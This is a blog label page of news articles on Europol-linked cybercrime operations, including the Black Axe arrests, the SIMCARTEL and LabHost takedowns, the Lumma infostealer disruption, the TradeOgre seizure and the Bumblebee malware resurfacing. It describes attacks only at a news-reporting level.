Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Europol. Show all posts
Spain
Black Axe Gang Cyber Crime Europe Europol Germany Spain

Europol Cracks Down Gang Responsible for Cyber Crime Worth Billions


Europol’s joint operation to crackdown international gang

Europol recently arrested 34 people in Spain who are alleged to have a role in a global criminal gang called Black Axe. The operation was conducted by Spanish National Police and Bavarian State Criminal Police Office and Europol. 

Twenty eight individuals were arrested in Seville, three in Madrid and two in Malaga, and the last one in Barcelona. Among the 34 suspects, 10 individuals are from Nigeria. 

“The action resulted in 34 arrests and significant disruptions to the group's activities. Black Axe is a highly structured, hierarchical group with its origins in Nigeria and a global presence in dozens of countries,” Europol said in a press release on its website. 

About Black Axe 

Black Axe is infamous for its role in various cyber crimes like frauds, human trafficking, prostitution, drug trafficking, armed robbery, kidnapping, and malicious spiritual activities. The gang annually earns roughly billions of euros via these operations that have a massive impact. 

Officials suspect that Black Axe is responsible for fraud worth over 5.94 million euros. During the operation, the investigating agencies froze 119352 euros in bank accounts and seized 66403 euros in cash during home searches. 

The crackdown 

Germany and Spain's cross-border cooperation includes the deployment of two German officers on the scene on the day of action, the exchange of intelligence, and the provision of analytical support to Spanish investigators. 

The core group of the organized crime network, which recruits money mules in underprivileged communities with high unemployment rates, was the objective of the operation. The majority of these susceptible people are of Spanish nationality and are used to support the illegal activities of the network.

Europol's key role

Europol provided a variety of services to help this operation, such as intelligence analysis, a data sprint in Madrid, and on-the-spot assistance. Mapping the organization's structure across nations, centralizing data, exchanging important intelligence packages, and assisting with coordinated national investigations have all been made possible by Europol. 

In order to solve the problems caused by the group's scattered little cases, cross-border activities, and the blurring of crimes into "ordinary" local offenses, this strategy seeks to disrupt the group's operations and recover assets.



Read more »
Phishing Attack
Cyber Security cybercriminal group Europol Fake Accounts Fake SIM Card Fraud Interpol Phishing Attack

Europol Dismantles SIMCARTEL Network Behind Global Phishing and SIM Box Fraud Scheme

 

Europol has taken down a vast international cybercrime network responsible for orchestrating large-scale phishing, fraud, and identity theft operations through mobile network systems. The coordinated crackdown, codenamed “SIMCARTEL,” led to multiple arrests and the seizure of a massive infrastructure used to fuel telecom-based criminal activity across more than 80 countries. 

Investigators from Austria, Estonia, and Latvia spearheaded the probe, linking the criminal network to over 3,200 cases of fraud, including fake investment scams and emergency call frauds designed for quick financial gain. The financial toll of the operation reached approximately $5.3 million in Austria and $490,000 in Latvia, highlighting the global scale of the scheme. 

The coordinated action, conducted primarily on October 10 in Latvia, resulted in the arrest of seven suspects and the seizure of 1,200 SIM box devices loaded with nearly 40,000 active SIM cards. Authorities also discovered hundreds of thousands of unused SIM cards, along with five servers, two websites, and several luxury vehicles. Around $833,000 in funds across bank and cryptocurrency accounts were also frozen during the operation. 

According to Europol, the infrastructure was designed to mask the true identities and locations of perpetrators, allowing them to create fake social media and communication accounts for cybercrimes. “The network enabled criminals to establish fraudulent online profiles that concealed their real identity and were then used to carry out phishing and financial scams,” Europol said in a statement. 

Investigators have traced the network to over 49 million fake accounts believed to have been created and distributed by the suspects. These accounts were used in a range of crimes, including extortion, smuggling, and online marketplace scams, as well as fake investment and e-commerce schemes. 

The operation highlights the growing global threat of SIM farms—collections of SIM boxes that allow cybercriminals to automate scams, send spam, and commit fraud while remaining undetected by telecom providers. These systems have become a preferred tool for large-scale phishing and social engineering attacks worldwide. 

Just weeks earlier, the U.S. Secret Service dismantled a similar network in New York City, seizing over 300 servers and 100,000 SIM cards spread across several locations. 

Cybersecurity intelligence firm Unit 221B also issued a warning that SIM farms are rapidly multiplying and putting telecom providers, banks, and consumers at risk. “We’ve identified at least 200 SIM boxes operating across dozens of U.S. sites,” said Ben Coon, Chief Intelligence Officer at Unit 221B. 

While the SIMCARTEL takedown marks a major victory for law enforcement, Europol noted that investigations are still underway to uncover the full extent of the criminal infrastructure. Authorities emphasize that combating SIM box networks is essential to defending users against phishing, identity fraud, and telecom-based cyberattacks that continue to grow in sophistication and scale.
Read more »
TradeOgre
Canada cryptocurrency Cyber Security Europol KYC Money Laundering Scams TradeOgre

Canadian Police Seize $40M in Digital Assets After Closing TradeOgre

 


Canadian police have shut down the cryptocurrency trading platform TradeOgre and seized digital assets valued at more than $40 million USD, marking both the country’s largest cryptocurrency seizure and the first time a crypto exchange has been dismantled by national law enforcement.


A Platform Built on Anonymity

TradeOgre was a small but notable exchange that allowed users to trade niche digital currencies, including Monero, which is popular for its privacy features. The platform stood out for avoiding Know Your Customer (KYC) checks, meaning people could open accounts without providing identification. According to the Royal Canadian Mounted Police (RCMP), TradeOgre also failed to register as a money services business with FINTRAC, Canada’s financial watchdog. These gaps made the exchange appealing to those seeking anonymity but also raised red flags for regulators.

The case began in June 2024, when Canada’s Money Laundering Investigative Team (MLIT) opened a probe after receiving intelligence from Europol. Investigators relied on blockchain tracing tools to track wallet activity linked to the platform. In July 2024, TradeOgre suddenly went offline without any announcement from its operators, fueling rumors among users that it had carried out an “exit scam.” Authorities later confirmed that the takedown was part of their enforcement action.


Why Authorities Took Action

The RCMP said TradeOgre was operating illegally in Canada because it was unregistered and allowed anonymous trading. Investigators suspect the site was used by criminals to launder illicit funds, taking advantage of Monero and other privacy-focused coins. However, officials stressed that not all customer funds were necessarily linked to crime.

In a statement, the RCMP clarified that they could not confirm whether the seized assets came from specific crimes such as extortion. They also noted that details about the exact sources of the money could not be released at this stage.


Fallout and Reactions

The sudden seizure left many users cut off from their funds. Some, including well-known crypto community members like Taylor Monahan of MetaMask, criticized the move, arguing that innocent users had their assets frozen without warning. “Very much looking forward to seeing the evidence… and for you to provide recourse to ALL innocent parties,” Monahan wrote on social media.

The RCMP responded that individuals who believe their funds were legitimate may seek remedies through the Canadian court system if the assets are subject to forfeiture proceedings. The agency added that any inquiries about the seized cryptocurrency should be directed to the MLIT.


A Warning for Crypto Users

Authorities emphasized that this case shows the risks of using unregulated exchanges. While anonymity may appeal to some traders, platforms that avoid oversight expose customers to legal uncertainty, sudden shutdowns, and loss of access to funds.



Read more »
takedown
CloudFlare Cybersecurity DOJ Europol FBI Infostealer Lumma malware Microsoft takedown

Global Operation Dismantles Lumma Malware Network, Seizes 2,300 Domains and Infrastructure

 

In a sweeping international crackdown earlier this month, a collaborative operation involving major tech firms and law enforcement agencies significantly disrupted the Lumma malware-as-a-service (MaaS) operation. This effort resulted in the seizure of thousands of domains and dismantling of key components of Lumma's infrastructure across the globe.

A major milestone in the operation occurred on May 13, 2025, when Microsoft, through legal action, successfully took control of around 2,300 domains associated with the malware. Simultaneously, the U.S. Department of Justice (DOJ) dismantled online marketplaces used by cybercriminals to rent Lumma’s services, while Europol’s European Cybercrime Center (EC3) and Japan’s Cybercrime Control Center (JC3) helped take down Lumma’s infrastructure in their respective regions.

"Between March 16, 2025, and May 16, 2025, Microsoft identified over 394,000 Windows computers globally infected by the Lumma malware. Working with law enforcement and industry partners, we have severed communications between the malicious tool and victims," said Steven Masada, Assistant General Counsel of Microsoft's Digital Crimes Unit.

Cloudflare, one of the key players in the effort, highlighted the impact of the takedown.

“The Lumma Stealer disruption effort denies the Lumma operators access to their control panel, marketplace of stolen data, and the Internet infrastructure used to facilitate the collection and management of that data. These actions impose operational and financial costs on both the Lumma operators and their customers, forcing them to rebuild their services on alternative infrastructure,” Cloudflare stated.

The operation saw contributions from companies like ESET, CleanDNS, Bitsight, Lumen, GMO Registry, and law firm Orrick. According to Cloudflare, the Lumma malware misused their platform to mask server IP addresses that were used to siphon off stolen credentials and sensitive data.

Even after suspending malicious domains, the malware managed to bypass Cloudflare’s interstitial warning page, prompting the company to reinforce its security measures.

"Cloudflare's Trust and Safety team repeatedly flagged domains used by the criminals and suspended their accounts," the company explained.

“In February 2025, Lumma’s malware was observed bypassing Cloudflare’s interstitial warning page, which is one countermeasure that Cloudflare employs to disrupt malicious actors. In response, Cloudflare added the Turnstile service to the interstitial warning page, so the malware could not bypass it." 

Also known as LummaC2, Lumma is a sophisticated information-stealing malware offered as a subscription-based service, ranging from $250 to $1,000. It targets both Windows and macOS systems, enabling cybercriminals to exfiltrate data from browsers and apps.

Once installed, Lumma can extract a broad range of data, including login credentials, credit card numbers, cryptocurrency wallets, cookies, and browsing history from popular browsers like Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium-based platforms. The stolen data is packaged and sent to attacker-controlled servers, where it is either sold on dark web marketplaces or used in follow-up cyberattacks.

Initially spotted in December 2022 on cybercrime forums, the malware quickly gained traction. Cybersecurity firm KELA reported its rapid rise in popularity among cybercriminals.

IBM X-Force’s 2025 threat intelligence report revealed a 12% year-on-year increase in the number of stolen credentials being sold online, largely driven by the use of infostealers like Lumma. Phishing campaigns delivering such malware have surged by 84%, making Lumma the most dominant player in this threat landscape.

Lumma has been linked to major malvertising campaigns affecting hundreds of thousands of users and has been used by notorious groups such as the Scattered Spider cybercrime collective.

Recently, stolen data linked to Lumma has played a role in high-profile breaches at companies like PowerSchool, HotTopic, CircleCI, and Snowflake. In some cases, infostealer malware has been used to manipulate internet infrastructure, such as the Orange Spain RIPE account hijacking incident that disrupted BGP and RPKI configurations.

On the day of the crackdown, the FBI and CISA jointly issued a security advisory outlining indicators of compromise (IOCs) and detailing the tactics, techniques, and procedures (TTPs) employed by threat actors using Lumma malware.


Read more »
takedown
Cyber Fraud Cyberattack CyberCrime Cybersecurity digitalcrime Europol Fraud Hacking LabHost LabRat lawenforcement phishing phishingkits phishingtools takedown

Global Cybercrime Crackdown Dismantles Major Phishing-as-a-Service Platform ‘LabHost’

 

In a major international crackdown, a law enforcement operation spearheaded by the London Metropolitan Police and coordinated by Europol has successfully taken down LabHost, one of the most notorious phishing-as-a-service (PhaaS) platforms used by cybercriminals worldwide.

Between April 14 and April 17, 2024, authorities carried out synchronized raids across 70 different sites globally, resulting in the arrest of 37 individuals. Among those arrested were four suspects in the UK believed to be the platform’s original creators and administrators. Following the arrests, LabHost’s digital infrastructure was completely dismantled.

LabHost had gained infamy for its ease of use and wide accessibility, making it a go-to cybercrime tool. The service offered more than 170 fake website templates imitating trusted brands from the banking, telecom, and logistics sectors—allowing users to craft convincing phishing campaigns with minimal effort.

According to authorities, LabHost supported over 40,000 phishing domains and catered to approximately 10,000 users across the globe. The coordinated enforcement effort was supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), with 19 countries actively participating in the investigation.

LabHost showcased how cybercrime has become industrialized through subscription-based platforms. For a monthly fee of around $249, subscribers could access phishing kits, fraudulent websites, hosting services, and even tools to interact with victims in real-time.

One of its most dangerous features was LabRat, an integrated dashboard that enabled users to monitor ongoing phishing attacks. This tool also allowed cybercriminals to intercept two-factor authentication codes and login credentials, effectively bypassing modern security measures.

Its user-friendly interface eliminated the need for technical skills—opening the door for anyone with malicious intent and a credit card to launch sophisticated phishing schemes. The platform's popularity contributed to a spike in identity theft, financial fraud, and widespread data breaches.

Authorities hailed the takedown as a milestone in the fight against cybercrime. However, they also cautioned that the commoditization of cybercrime remains a serious concern.

"This is a critical blow to phishing infrastructure," cybersecurity experts said, "but the ease of recreating similar platforms continues to pose a major threat."

Following the seizure of LabHost’s backend systems, law enforcement agencies have begun analyzing the data to identify the perpetrators and their victims. This will mark the beginning of a new wave of investigations and preventative measures.

The operation involved agencies from 19 countries, including the FBI and Secret Service from the United States, as well as cybercrime units in Canada, Germany, the Netherlands, Poland, Spain, Australia, and the UK. This unprecedented level of international cooperation highlights the cross-border nature of cyber threats and the importance of unified global action.

As authorities prepare for a fresh wave of prosecutions, the LabHost takedown stands as a defining moment in cyber law enforcement—both in its impact and its symbolism.
Read more »
Technology
Artificial Intelligence Criminal Breach European Union Europol Technology

AI Technology is Helping Criminal Groups Grow Stronger in Europe, Europol Warns

 



The European Union’s main police agency, Europol, has raised an alarm about how artificial intelligence (AI) is now being misused by criminal groups. According to their latest report, criminals are using AI to carry out serious crimes like drug dealing, human trafficking, online scams, money laundering, and cyberattacks.

This report is based on information gathered from police forces across all 27 European Union countries. Released every four years, it helps guide how the EU tackles organized crime. Europol’s chief, Catherine De Bolle, said cybercrime is growing more dangerous as criminals use advanced digital tools. She explained that AI is giving criminals more power, allowing them to launch precise and damaging attacks on people, companies, and even governments.

Some crimes, she noted, are not just about making money. In certain cases, these actions are also designed to cause unrest and weaken countries. The report explains that criminal groups are now working closely with some governments to secretly carry out harmful activities.

One growing concern is the rise in harmful online content, especially material involving children. AI is making it harder to track and identify those responsible because fake images and videos look very real. This is making the job of investigators much more challenging.

The report also highlights how criminals are now able to trick people using technology like voice imitation and deepfake videos. These tools allow scammers to pretend to be someone else, steal identities, and threaten people. Such methods make fraud, blackmail, and online theft harder to spot.

Another serious issue is that countries are now using criminal networks to launch cyberattacks against their rivals. Europol noted that many of these attacks are aimed at important services like hospitals or government departments. For example, a hospital in Poland was recently hit by a cyberattack that forced it to shut down for several hours. Officials said the use of AI made this attack more severe.

The report warns that new technology is speeding up illegal activities. Criminals can now carry out their plans faster, reach more people, and operate in more complex ways. Europol urged countries to act quickly to tackle this growing threat.

The European Commission is planning to introduce a new security policy soon. Magnus Brunner, the EU official in charge of internal affairs, said Europe needs to stay alert and improve safety measures. He also promised that Europol will get more staff and better resources in the coming years to fight these threats.

In the end, the report makes it clear that AI is making crime more dangerous and harder to stop. Stronger cooperation between countries and better cyber defenses will be necessary to protect people and maintain safety across Europe.

Read more »
phishing
Airbnb Cyber Fraud Europol links Netherlands phishing

Cybercrime Network Busted: Turning Airbnbs Into Fraud Centers

 


An international cybercrime network responsible for stealing millions of euros has been dismantled in a joint operation conducted in Belgium and the Netherlands. The Europol-coordinated effort led to eight arrests and 17 coordinated raids across the two countries on December 3.

Investigation and Arrests

The investigation, which began in 2022, targeted a gang involved in phishing, online fraud, and money laundering. Four suspects—three men and one woman, aged between 23 and 66—were arrested in the Netherlands. They face charges of participating in a criminal organization.

Authorities seized various pieces of evidence during the raids, including mobile phones, data storage devices, significant amounts of cash, and luxury items purchased with stolen funds. These findings underscored the extensive fraudulent activities conducted by the group.

Airbnbs: Temporary Bases for Cybercrime

The gang used rented Airbnb properties and luxury apartments as temporary call centers to avoid detection. Operating from these locations, they launched phishing attacks targeting victims across Europe. Communication methods included emails, text messages, and WhatsApp messages, in which they impersonated bank representatives or fraud prevention agents.

Victims were informed that their bank accounts had been compromised and were directed to fake banking websites designed to appear legitimate. Once victims entered sensitive information such as login credentials or PINs, the attackers swiftly accessed their accounts and withdrew funds. In some cases, unsuccessful fraud attempts led to verbal harassment, adding emotional distress to the victims’ financial losses.

Spending Details

Rather than keeping a low profile, the gang openly flaunted their stolen wealth online. They spent lavishly on luxury vacations, designer clothes, high-end cars, and exclusive parties. Their social media profiles featured images showcasing expensive purchases and interactions with celebrities, further exposing their illegal activities.

How to Avoid Phishing Scams

Phishing scams remain one of the most common tactics used by cybercriminals. To protect yourself:

  1. Treat unsolicited calls, messages, and emails with suspicion, especially if they request sensitive information.
  2. Avoid clicking on suspicious links. Instead, verify claims by contacting your bank directly through official channels.
  3. Be cautious of small demands for money on second-hand sales websites; these may be attempts to steal card information.

Impact

Europol highlights that phishing tactics are constantly evolving, making them harder to trace. This case underscores the importance of vigilance and staying informed about online threats. As cybercrime becomes more sophisticated, individuals must take proactive steps to secure their personal and financial data.

The success of this operation demonstrates the critical role of international collaboration in combating cybercrime. It serves as a powerful reminder of the ongoing need for cooperation between law enforcement agencies to effectively counter global threats.

Read more »
TrickBot
Bumblebee Cyberattack Cybersecurity Europol malware MSI Netskope phishing Ransomware TrickBot

Bumblebee Malware Resurfaces in New Attacks Following Europol Crackdown

 

iThe Bumblebee malware loader, inactive since Europol's 'Operation Endgame' in May, has recently resurfaced in new cyberattacks. This malware, believed to have been developed by TrickBot creators, first appeared in 2022 as a successor to the BazarLoader backdoor, giving ransomware groups access to victim networks.

Bumblebee spreads through phishing campaigns, malvertising, and SEO poisoning, often disguised as legitimate software such as Zooom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the dangerous payloads it delivers are Cobalt Strike beacons, data-stealing malware, and ransomware.

Operation Endgame was a large-scale law enforcement effort that targeted and dismantled over a hundred servers supporting various malware loaders, including IcedID, Pikabot, TrickBot, Bumblebee, and more. Following this, Bumblebee activity appeared to cease. However, cybersecurity experts at Netskope have recently detected new instances of the malware, hinting at a possible resurgence.

The latest Bumblebee attack involves a phishing email that tricks recipients into downloading a malicious ZIP file. Inside is a .LNK shortcut that activates PowerShell to download a harmful MSI file disguised as an NVIDIA driver update or Midjourney installer.

This MSI file is executed silently, and Bumblebee uses it to deploy itself in the system's memory. The malware uses a DLL unpacking process to establish itself, showing configuration extraction methods similar to previous versions. The encryption key "NEW_BLACK" was identified in recent attacks, along with two campaign IDs: "msi" and "lnk001."

Although Netskope hasn't shared details about the payloads Bumblebee is currently deploying, the new activity signals the malware’s possible return. A full list of indicators of compromise can be found on a related GitHub repository.
Read more »
Subscribe to: Comments (Atom)